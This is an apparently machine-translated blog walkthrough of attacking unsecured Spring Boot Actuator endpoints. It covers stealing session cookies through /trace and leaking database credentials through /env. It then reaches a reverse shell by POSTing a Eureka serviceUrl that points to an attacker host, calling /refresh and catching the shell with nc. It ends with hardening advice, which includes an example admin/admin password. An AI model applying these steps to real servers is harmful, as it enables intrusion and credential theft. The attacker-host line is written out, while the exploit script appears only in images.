Example Analysis of Spring Boot Actuator from Unauthorized Access to getshell

<p>Preface department bosses dug this hole in a src, which is an old hole. I found it interesting, so I set up an environmental test in the local area.</p><p>Actuator is a functional module provided by springboot to introspect and monitor the application system. With the help of Actuator, developers can easily check and count some monitoring indicators of the application system. When the Actuator is enabled, illegal users can access the default actuator endpoints to obtain monitoring information in the application system, which will lead to information leakage and even the server being taken over.</p><p>Actuator is a functional module provided by Spring Boot, which can be used for introspection and monitoring application systems. The provided executor endpoints are divided into two categories: native endpoints and user-defined extension endpoints. The native endpoints mainly include:</p><p><img src="//img.freeonlinedomain.com/uploads/allimg/20230921/1-230921153145250.jpg" title="" alt="2023052411540261630_1.jpg"/></p><p>Getshell with env and refresh by thinking</p><p>Use mappings to find unauthorized interfaces.</p><p>Use trace to obtain authentication information (Cookie, cookie, Session), and use authentication information to access the interface.</p><p>Env may reveal the database account password (mangodb), of course, it is less likely to open the external network.</p><p>Foreigners say that they can execute sql statements, but they don&#39;t understand it at present.</p><p>Vulnerability discovery usually identifies the framework used by current web applications as springboot framework. There are two main ways to judge:</p><p>Through the icon (favicon.ico) of the webpage label of the web application; If the web application developer has not modified the default icon of the springboot web application, you can see the following default small green icon after entering the application homepage:</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/tekj4qxzdfe190.jpg"/></p><p>Default error page through springboot framework; If the web application developer doesn&#39;t modify the default 4xx and 5xx error pages of springboot web application, when 4xx and 5xx errors occur in the web application, the following errors will be reported (here, only the 404 error page is taken as an example): Visit a randomly constructed path, such as http:/172.26.2.24:8090/index, and the following error page will appear to explain the use of the web site.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/0jy3mrqmw5y191.jpg"/></p><p>Combining the above two ways to judge whether the current web application is a springboot framework is to visit different directories to see if there are small green leaf icons, and then try to trigger 4xx or 5xx errors of the application in different directories to see if there are Whitelabel Error Page.</p><p>Vulnerabilities use access /trace endpoints to obtain basic HTTP request tracking information (timestamp, HTTP header, etc.). If there is an operation request of the login user, a cookie can be forged to log in.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/mse0mkdves4192.jpg"/></p><p>Visit the /env endpoint to get all the environmental attributes. Because the actuator will monitor the database services such as mysql and mangodb, the monitoring information can sometimes be used to monitor the mysql and mangodb database information. If the database happens to be open in the public network, the harm caused is enormous.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/o0et3mr1ucl193.jpg"/></p><p>Improper configuration of /env endpoint causes RCE,</p><p>Preconditions: Eureka-Client, for example, testing json at the front desk to reveal the package name is to use netflix.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/pi1hgutzww1194.jpg"/></p><p>The following two packages are required.</p><p>Spring-boot-starter-actuator (/refresh required to refresh the configuration)</p><p>Spring-cloud-starter-Netflix-Eureka-client (functional dependency)</p><p>Using python3 to start a script, we need to pay attention to two places, one is the ip and port of the receiving shell, and the other is the port started by our script.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/b5p4turmrne195.jpg"/></p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/nx2ej33o3hh196.jpg"/></p><p>Nc listens to a port to receive the bounce shell.</p><p>Write the configuration, visit the /env endpoint, and grab the package to change the get request into a post request. The post content is (the ip is the ip of the machine started by the script):</p><p>eureka.client.serviceUrl.defaultZone=http://10.1.1.135:2333/xstream</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/yh3m1nrqfs0197.jpg"/></p><p>Then visit /refresh, grab the package and change the get request into a post request, and the post data is arbitrary.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/2lqsruoag5m198.jpg"/></p><p>Then in our nc window, we can see that a shell bounced back successfully.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/sag5kwo03ao199.jpg"/></p><p>As a security dog, vulnerability repair can&#39;t just dig without repairing, and introduce the spring-boot-starter-security dependency under the pom.xml file of the project.</p><p>org.springframework.bootspring-boot-starter-security</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/sghbhzblfdd200.jpg"/></p><p>Then open the security function in application.properties, configure the password of the access account, and restart the application to pop up.</p><p>management.security.enabled=truesecurity.user.name=adminsecurity.user.password=admin</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/2w5xnnemyzt201.jpg"/></p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/tpsupwu2404202.jpg"/></p><p>If the interface is disabled, it can be set as follows (such as disabling the env interface):</p><p>endpoints.env.enabled= false</p><p>The foreigner said that he could execute the sql statement and found that he couldn&#39;t. Maybe the method was useless. I took a picture of him, hoping to share it with the bosses who successfully executed it.</p><p><img src="https://freeonlinedomain.com/uploads/allimg/Server/20230921/t5znsuea1d0203.jpg"/></p><p>In the actual environment, it is found that many commands cannot be executed because there is no refresh, and there is no breakthrough at present.</p>